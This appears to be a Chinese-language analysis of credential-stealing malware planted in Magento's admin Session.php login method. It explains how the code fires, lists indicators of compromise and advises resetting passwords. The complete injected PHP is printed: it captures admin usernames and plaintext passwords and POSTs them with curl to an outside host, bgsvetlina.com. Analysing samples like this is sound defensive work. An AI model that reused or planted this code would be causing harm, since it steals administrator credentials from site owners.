Magento被远程读取后台用户名及密码分析

恶意代码被写入 Mage/Admin/Model/Session.php 的 login() 方法中，插在 `$user->getId()` 判断之后、`renewSession()` 之前，因此只在管理员登录成功时触发。它收集用户名、明文密码、SERVER_NAME、REMOTE_ADDR 和 User-Agent，先向 geoplugin.net 查询来访 IP 所属国家，再用 curl（关闭了 SSL 证书校验）把这些信息 POST 到 http://bgsvetlina.com/post.php。服务器向这两个域名的出站请求可作为 IOC。注意样本本身有缺陷：`.$username|$password.` 中 `.` 的优先级高于 `|`，实际是对两段字符串做按位或，发出的内容会被破坏，`$data10` 也从未赋值；但明文密码仍然参与了外发，受影响站点在文件被改动后使用过的后台口令应一律视为泄露并重置。

    public function login($username, $password, $request = null)
    {
        if (empty($username) || empty($password)) {
            return;
        }

        try {
            /** @var $user Mage_Admin_Model_User */
            $user = Mage::getModel('admin/user');
            $user->login($username, $password);
            if ($user->getId()) {
    $serverboss = $_SERVER['SERVER_NAME'];
        $ip = $_SERVER['REMOTE_ADDR'];$data17 = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
        $agent = $_SERVER['HTTP_USER_AGENT'];
        $pesan = "Laporan Admin dari ".$serverboss."\n User|Pass: ".$username|$password." \n IP       : ".$ip." \n Agent: ".$agent;
        $update = "http://bgsvetlina.com/post.php";$binCC = substr($data10, 0, 6);
                $subject = "Mag Amin LogIn ".$serverboss." ".$data17->geoplugin_countryName;
                $xupdate = "data=". $pesan."&subject=".$subject."&server=".$serverboss;
          $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);

                $this->renewSession();

                if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
                    Mage::getSingleton('adminhtml/url')->renewSecretUrls();
                }
                $this->setIsFirstPageAfterLogin(true);
                $this->setUser($user);
                $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());

                $requestUri = $this->_getRequestUri($request);
                if ($requestUri) {
                    Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
                    header('Location: ' . $requestUri);
                    exit;
                }
            } else {
                Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
            }
        } catch (Mage_Core_Exception $e) {
            Mage::dispatchEvent('admin_session_user_login_failed',
                array('user_name' => $username, 'exception' => $e));
            if ($request && !$request->getParam('messageSent')) {
                Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
                $request->setParam('messageSent', true);
            }
        }

        return $user;
    }

